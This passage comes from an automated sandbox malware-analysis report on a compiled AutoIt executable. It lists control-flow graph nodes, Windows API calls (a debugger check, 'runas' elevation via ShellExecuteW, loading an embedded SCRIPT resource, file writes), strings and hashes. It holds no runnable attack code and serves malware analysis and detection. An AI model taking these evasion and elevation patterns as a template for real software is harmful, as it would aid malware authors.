e6b5a0-e6b5b6 714->725 726 e6b5de-e6b627 WriteFile 714->726 727 e6b1d4-e6b1d6 715->727 716->703 717->718 718->697 718->708 719->693 728 e6b53e-e6b54f 719->728 730 e6b6c7-e6b6d6 720->730 731 e6b6b5-e6b6c4 720->731 721->685 733 e6b71f-e6b721 721->733 723->692 724->692 735 e6b5cd-e6b5dc 725->735 736 e6b5b8-e6b5ca 725->736 726->685 738 e6b62d-e6b645 726->738 739 e6b1dc-e6b1fe 727->739 740 e6b36b-e6b36e 727->740 728->690 729 e6b555 728->729 729->693 730->711 730->721 731->730 743 e6b727-e6b75a WriteFile 733->743 735->714 735->726 736->735 738->693 746 e6b64b-e6b658 738->746 747 e6b217-e6b223 call e61688 739->747 748 e6b200-e6b215 739->748 741 e6b375-e6b3a2 740->741 742 e6b370-e6b373 740->742 749 e6b3a8-e6b3ab 741->749 742->741 742->749 750 e6b75c-e6b776 743->750 751 e6b77a-e6b78e GetLastError 743->751 746->704 753 e6b65e 746->753 763 e6b225-e6b239 747->763 764 e6b269-e6b26b 747->764 754 e6b271-e6b283 call e740f7 748->754 757 e6b3b2-e6b3c5 call e75884 749->757 758 e6b3ad-e6b3b0 749->758 750->743 759 e6b778 750->759 762 e6b794-e6b796 751->762 753->693 773 e6b435-e6b43b 754->773 774 e6b289 754->774 757->685 777 e6b3cb-e6b3d5 757->777 758->757 765 e6b407-e6b40a 758->765 759->762 762->686 768 e6b798-e6b7b0 762->768 770 e6b412-e6b42d 763->770 771 e6b23f-e6b254 call e740f7 763->771 764->754 765->727 769 e6b410 765->769 768->710 775 e6b7b6 768->775 769->773 770->773 771->773 783 e6b25a-e6b267 771->783 773->686 778 e6b28f-e6b2c4 WideCharToMultiByte 774->778 775->693 780 e6b3d7-e6b3ee call e75884 777->780 781 e6b3fb-e6b401 777->781 778->773 782 e6b2ca-e6b2f0 WriteFile 778->782 780->685 788 e6b3f4-e6b3f5 780->788 781->765 782->685 785 e6b2f6-e6b30e 782->785 783->778 785->773 787 e6b314-e6b31b 785->787 787->781 789 e6b321-e6b34c WriteFile 787->789 788->781 789->685 790 e6b352-e6b359 789->790 790->773 791 e6b35f-e6b366 790->791 791->781
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bdc64a5f835307b74d188fab0b35cbb1fca7f9977c571115976401ec7d3bdc1c
                                                        • Instruction ID: dd36fd77bffaaea63a9abd803d26917118b87d7fc5faa2c4dc9b359393e03876
                                                        • Opcode Fuzzy Hash: bdc64a5f835307b74d188fab0b35cbb1fca7f9977c571115976401ec7d3bdc1c
                                                        • Instruction Fuzzy Hash: 57325975A422288FCB248F14EC81AE9B7F5FB46354F1851E9E40AE7A91D7309EC1CF52

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00E43AA3,?), ref: 00E43D45
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,00E43AA3,?), ref: 00E43D57
                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,00F01148,00F01130,?,?,?,?,00E43AA3,?), ref: 00E43DC8
                                                          • Part of subcall function 00E46430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E43DEE,00F01148,?,?,?,?,?,00E43AA3,?), ref: 00E46471
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,00E43AA3,?), ref: 00E43E48
                                                        • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00EF28F4,00000010), ref: 00EB1CCE
                                                        • SetCurrentDirectoryW.KERNEL32(?,00F01148,?,?,?,?,?,00E43AA3,?), ref: 00EB1D06
                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00EDDAB4,00F01148,?,?,?,?,?,00E43AA3,?), ref: 00EB1D89
                                                        • ShellExecuteW.SHELL32(00000000,?,?,?,?,00E43AA3), ref: 00EB1D90
                                                          • Part of subcall function 00E43E6E: GetSysColorBrush.USER32(0000000F), ref: 00E43E79
                                                          • Part of subcall function 00E43E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00E43E88
                                                          • Part of subcall function 00E43E6E: LoadIconW.USER32(00000063), ref: 00E43E9E
                                                          • Part of subcall function 00E43E6E: LoadIconW.USER32(000000A4), ref: 00E43EB0
                                                          • Part of subcall function 00E43E6E: LoadIconW.USER32(000000A2), ref: 00E43EC2
                                                          • Part of subcall function 00E43E6E: RegisterClassExW.USER32(?), ref: 00E43F30
                                                          • Part of subcall function 00E436B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E436E6
                                                          • Part of subcall function 00E436B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E43707
                                                          • Part of subcall function 00E436B8: ShowWindow.USER32(00000000,?,?,?,?,00E43AA3,?), ref: 00E4371B
                                                          • Part of subcall function 00E436B8: ShowWindow.USER32(00000000,?,?,?,?,00E43AA3,?), ref: 00E43724
                                                          • Part of subcall function 00E44FFC: _memset.LIBCMT ref: 00E45022
                                                          • Part of subcall function 00E44FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E450CB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                        • String ID: ()$This is a third-party compiled AutoIt script.$runas
                                                        • API String ID: 438480954-3074634049
                                                        • Opcode ID: 391b50efaf84d72471ceec4dcde1974907e00cb39b52d5ec5349f25834d32c75
                                                        • Instruction ID: 4994d148bbd436ee77ebd1f3fcd3ef4a712078b799ebf6d43491c69c73879908
                                                        • Opcode Fuzzy Hash: 391b50efaf84d72471ceec4dcde1974907e00cb39b52d5ec5349f25834d32c75
                                                        • Instruction Fuzzy Hash: AF510631A05348AECF15ABB4FC45EEE7BB9BB19744F006079F641731A2DA71460AEB21

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1137 e5ddc0-e5de4f call e4d7f7 GetVersionExW call e46a63 call e5dfb4 call e46571 1146 e5de55-e5de56 1137->1146 1147 eb24c8-eb24cb 1137->1147 1148 e5de92-e5dea2 call e5df77 1146->1148 1149 e5de58-e5de63 1146->1149 1150 eb24cd 1147->1150 1151 eb24e4-eb24e8 1147->1151 1168 e5dea4-e5dec1 GetCurrentProcess call e5df5f 1148->1168 1169 e5dec7-e5dee1 1148->1169 1154 eb244e-eb2454 1149->1154 1155 e5de69-e5de6b 1149->1155 1157 eb24d0 1150->1157 1152 eb24ea-eb24f3 1151->1152 1153 eb24d3-eb24dc 1151->1153 1152->1157 1160 eb24f5-eb24f8 1152->1160 1153->1151 1158 eb245e-eb2464 1154->1158 1159 eb2456-eb2459 1154->1159 1161 eb2469-eb2475 1155->1161 1162 e5de71-e5de74 1155->1162 1157->1153 1158->1148 1159->1148 1160->1153 1164 eb247f-eb2485 1161->1164 1165 eb2477-eb247a 1161->1165 1166 eb2495-eb2498 1162->1166 1167 e5de7a-e5de89 1162->1167 1164->1148 1165->1148 1166->1148 1172 eb249e-eb24b3 1166->1172 1173 eb248a-eb2490 1167->1173 1174 e5de8f 1167->1174 1168->1169 1188 e5dec3 1168->1188 1170 e5df31-e5df3b GetSystemInfo 1169->1170 1171 e5dee3-e5def7 call e5e00c 1169->1171 1177 e5df0e-e5df1a 1170->1177 1185 e5df29-e5df2f GetSystemInfo 1171->1185 1186 e5def9-e5df01 call e5dff4 GetNativeSystemInfo 1171->1186 1179 eb24bd-eb24c3 1172->1179 1180 eb24b5-eb24b8 1172->1180 1173->1148 1174->1148 1182 e5df21-e5df26 1177->1182 1183 e5df1c-e5df1f FreeLibrary 1177->1183 1179->1148 1180->1148 1183->1182 1187 e5df03-e5df07 1185->1187 1186->1187 1187->1177 1191 e5df09-e5df0c FreeLibrary 1187->1191 1188->1169 1191->1177
                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 00E5DDEC
                                                        • GetCurrentProcess.KERNEL32(00000000,00EDDC38,?,?), ref: 00E5DEAC
                                                        • GetNativeSystemInfo.KERNELBASE(?,00EDDC38,?,?), ref: 00E5DF01
                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00E5DF0C
                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00E5DF1F
                                                        • GetSystemInfo.KERNEL32(?,00EDDC38,?,?), ref: 00E5DF29
                                                        • GetSystemInfo.KERNEL32(?,00EDDC38,?,?), ref: 00E5DF35
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                        • String ID:
                                                        • API String ID: 3851250370-0
                                                        • Opcode ID: 03833458b87d15834d4a6fce5cff57c1881ddea8482f2e975ab93ab238952e77
                                                        • Instruction ID: 3e753617ab38fd2eadd6c51cbee2c932b84cec5030ae20dfadfdf54ca2dde0e6
                                                        • Opcode Fuzzy Hash: 03833458b87d15834d4a6fce5cff57c1881ddea8482f2e975ab93ab238952e77
                                                        • Instruction Fuzzy Hash: 7661AFB190A384CFCF25CF6898C15EA7FB4AF29305B1999D9DC45AF207C624890DCB66

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1209 e4406b-e44083 CreateStreamOnHGlobal 1210 e44085-e4409c FindResourceExW 1209->1210 1211 e440a3-e440a6 1209->1211 1212 e440a2 1210->1212 1213 eb4f16-eb4f25 LoadResource 1210->1213 1212->1211 1213->1212 1214 eb4f2b-eb4f39 SizeofResource 1213->1214 1214->1212 1215 eb4f3f-eb4f4a LockResource 1214->1215 1215->1212 1216 eb4f50-eb4f6e 1215->1216 1216->1212
                                                        APIs
                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00E4449E,?,?,00000000,00000001), ref: 00E4407B
                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00E4449E,?,?,00000000,00000001), ref: 00E44092
                                                        • LoadResource.KERNEL32(?,00000000,?,?,00E4449E,?,?,00000000,00000001,?,?,?,?,?,?,00E441FB), ref: 00EB4F1A
                                                        • SizeofResource.KERNEL32(?,00000000,?,?,00E4449E,?,?,00000000,00000001,?,?,?,?,?,?,00E441FB), ref: 00EB4F2F
                                                        • LockResource.KERNEL32(00E4449E,?,?,00E4449E,?,?,00000000,00000001,?,?,?,?,?,?,00E441FB,00000000), ref: 00EB4F42
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                        • String ID: SCRIPT
                                                        • API String ID: 3051347437-3967369404
                                                        • Opcode ID: 8672bf68d88a664489b2f179bc1809467d7856b79606dc0dd3922fe80c4b7910
                                                        • Instruction ID: 4210b3c8fc4091166c4ec1a9098eef5f40d78c416278d155c16502e361c4339f
                                                        • Opcode Fuzzy Hash: 8672bf68d88a664489b2f179bc1809467d7856b79606dc0dd3922fe80c4b7910
                                                        • Instruction Fuzzy Hash: A3115AB1304701AFE7258B66EC48F67BBB9EBC5B55F10413CF602A66A0DA72DC058A21
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,I/), ref: 00E86CB9
                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00E86CCA
                                                        • FindClose.KERNEL32(00000000), ref: 00E86CDA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: FileFind$AttributesCloseFirst
                                                        • String ID: I/
                                                        • API String ID: 48322524-530815126
                                                        • Opcode ID: 99e22f68fc6db7df006025d8fcf39dd64ef7dca187c59e6e47bc6e1b4c934601
                                                        • Instruction ID: f50bc2bc6f9224f290bc6d8fede93663f2e47430c4a3cfbfaf417fbc5692c9b9
                                                        • Opcode Fuzzy Hash: 99e22f68fc6db7df006025d8fcf39dd64ef7dca187c59e6e47bc6e1b4c934601
                                                        • Instruction Fuzzy Hash: F3E0D8318158105F82107738EC0D8E9776CDB05339F100725F479E11D0E772D90446D5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throwstd::exception::exception
                                                        • String ID: @
                                                        • API String ID: 3728558374-2766056989
                                                        • Opcode ID: 755da55f7ad98300e0d6fb159a75b257615c40c981ab4213ac69c141c17faa5d
                                                        • Instruction ID: f174e8fa2a8905c4e03a36f39545f49e8808f4b3f15a854db0f321ba48483e0f
                                                        • Opcode Fuzzy Hash: 755da55f7ad98300e0d6fb159a75b257615c40c981ab4213ac69c141c17faa5d
                                                        • Instruction Fuzzy Hash: 7D72AD74A042089FCF14DFA4C881AEEB7F5EF48345F14945AED49BB291D730AE49CBA1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID:
                                                        • API String ID: 3964851224-0
                                                        • Opcode ID: 8da478430530dd6a7162a5f784d8a0849ed2492b2764434098f382dea574b858
                                                        • Instruction ID: 34d9dd55d7011fcd153535c3fa7fde65fef75cbf6b9bd418f012c77512f3b3ce
                                                        • Opcode Fuzzy Hash: 8da478430530dd6a7162a5f784d8a0849ed2492b2764434098f382dea574b858
                                                        • Instruction Fuzzy Hash: 48928E706083419FD724DF28C480B6AB7E1BF88348F14A85DE99AAB352D771ED49CB52
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E4E959
                                                        • timeGetTime.WINMM ref: 00E4EBFA
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E4ED2E
                                                        • TranslateMessage.USER32(?), ref: 00E4ED3F
                                                        • DispatchMessageW.USER32(?), ref: 00E4ED4A
                                                        • LockWindowUpdate.USER32(00000000), ref: 00E4ED79
                                                        • DestroyWindow.USER32 ref: 00E4ED85
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E4ED9F
                                                        • Sleep.KERNEL32(0000000A), ref: 00EB5270
                                                        • TranslateMessage.USER32(?), ref: 00EB59F7
                                                        • DispatchMessageW.USER32(?), ref: 00EB5A05
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EB5A19
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                        • API String ID: 2641332412-570651680
                                                        • Opcode ID: faf9d1085eeb41759cd0fc7c1e5abf3a8c5cdcc06c7d46491de8b6822ab1df03
                                                        • Instruction ID: 99e4634f4ab3074556a89311c0d0339137f5ad2b138ef1a1cde2993d59027c78
                                                        • Opcode Fuzzy Hash: faf9d1085eeb41759cd0fc7c1e5abf3a8c5cdcc06c7d46491de8b6822ab1df03
                                                        • Instruction Fuzzy Hash: 6662A271508340DFDB24DF24D885BAA77E4BF84304F18697DF98AAB292DB71D848CB52
                                                        APIs
                                                        • ___createFile.LIBCMT ref: 00E75EC3
                                                        • ___createFile.LIBCMT ref: 00E75F04
                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00E75F2D
                                                        • __dosmaperr.LIBCMT ref: 00E75F34
                                                        • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00E75F47
                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00E75F6A
                                                        • __dosmaperr.LIBCMT ref: 00E75F73
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00E75F7C
                                                        • __set_osfhnd.LIBCMT ref: 00E75FAC
                                                        • __lseeki64_nolock.LIBCMT ref: 00E76016
                                                        • __close_nolock.LIBCMT ref: 00E7603C
                                                        • __chsize_nolock.LIBCMT ref: 00E7606C
                                                        • __lseeki64_nolock.LIBCMT ref: 00E7607E
                                                        • __lseeki64_nolock.LIBCMT ref: 00E76176
                                                        • __lseeki64_nolock.LIBCMT ref: 00E7618B
                                                        • __close_nolock.LIBCMT ref: 00E761EB
                                                          • Part of subcall function 00E6EA9C: CloseHandle.KERNELBASE(00000000,00EEEEF4,00000000,?,00E76041,00EEEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00E6EAEC
                                                          • Part of subcall function 00E6EA9C: GetLastError.KERNEL32(?,00E76041,00EEEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00E6EAF6
                                                          • Part of subcall function 00E6EA9C: __free_osfhnd.LIBCMT ref: 00E6EB03
                                                          • Part of subcall function 00E6EA9C: __dosmaperr.LIBCMT ref: 00E6EB25
                                                          • Part of subcall function 00E67C0E: __getptd_noexit.LIBCMT ref: 00E67C0E
                                                        • __lseeki64_nolock.LIBCMT ref: 00E7620D
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00E76342
                                                        • ___createFile.LIBCMT ref: 00E76361
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00E7636E
                                                        • __dosmaperr.LIBCMT ref: 00E76375
                                                        • __free_osfhnd.LIBCMT ref: 00E76395
                                                        • __invoke_watson.LIBCMT ref: 00E763C3
                                                        • __wsopen_helper.LIBCMT ref: 00E763DD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                        • String ID: @
                                                        • API String ID: 3896587723-2766056989
                                                        • Opcode ID: 610ec0a80ddee1e4938cee9f6d4d13d55e121c49bc712398770d8f7d0d9ba9a7
                                                        • Instruction ID: 40b277e3a957d393de30e389d03b5eb9b064221e40928f6a2dc6432d99d91c63
                                                        • Opcode Fuzzy Hash: 610ec0a80ddee1e4938cee9f6d4d13d55e121c49bc712398770d8f7d0d9ba9a7
                                                        • Instruction Fuzzy Hash: 9C222772900A099BEB299F68DC45BFE7B61EB0031CF24D228E529B72E2D7758D50C791

                                                        Control-flow Graph

                                                        APIs
                                                        • _wcscpy.LIBCMT ref: 00E8FA96
                                                        • _wcschr.LIBCMT ref: 00E8FAA4
                                                        • _wcscpy.LIBCMT ref: 00E8FABB
                                                        • _wcscat.LIBCMT ref: 00E8FACA
                                                        • _wcscat.LIBCMT ref: 00E8FAE8
                                                        • _wcscpy.LIBCMT ref: 00E8FB09
                                                        • __wsplitpath.LIBCMT ref: 00E8FBE6
                                                        • _wcscpy.LIBCMT ref: 00E8FC0B
                                                        • _wcscpy.LIBCMT ref: 00E8FC1D
                                                        • _wcscpy.LIBCMT ref: 00E8FC32
                                                        • _wcscat.LIBCMT ref: 00E8FC47
                                                        • _wcscat.LIBCMT ref: 00E8FC59
                                                        • _wcscat.LIBCMT ref: 00E8FC6E
                                                          • Part of subcall function 00E8BFA4: _wcscmp.LIBCMT ref: 00E8C03E
                                                          • Part of subcall function 00E8BFA4: __wsplitpath.LIBCMT ref: 00E8C083
                                                          • Part of subcall function 00E8BFA4: _wcscpy.LIBCMT ref: 00E8C096
                                                          • Part of subcall function 00E8BFA4: _wcscat.LIBCMT ref: 00E8C0A9
                                                          • Part of subcall function 00E8BFA4: __wsplitpath.LIBCMT ref: 00E8C0CE
                                                          • Part of subcall function 00E8BFA4: _wcscat.LIBCMT ref: 00E8C0E4
                                                          • Part of subcall function 00E8BFA4: _wcscat.LIBCMT ref: 00E8C0F7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                        • String ID: >>>AUTOIT SCRIPT<<<$t2
                                                        • API String ID: 2955681530-945735720
                                                        • Opcode ID: bff4be1cbe241bc2bfb7f4cd8bf06b13ae8758cddb5d789cd3973a88a151fb22
                                                        • Instruction ID: 24e210963b9a060e8f314b1451d6bf076d9c635b50e69b5344131afa7ea03f36
                                                        • Opcode Fuzzy Hash: bff4be1cbe241bc2bfb7f4cd8bf06b13ae8758cddb5d789cd3973a88a151fb22
                                                        • Instruction Fuzzy Hash: F291AF72504305AFCB20EF50D851F9BB3E8BF84314F046969F99DA7292DB30EA44CB92

                                                        Control-flow Graph

                                                        APIs
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00E43F86
                                                        • RegisterClassExW.USER32(00000030), ref: 00E43FB0
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E43FC1
                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00E43FDE
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E43FEE
                                                        • LoadIconW.USER32(000000A9), ref: 00E44004
                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E44013
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
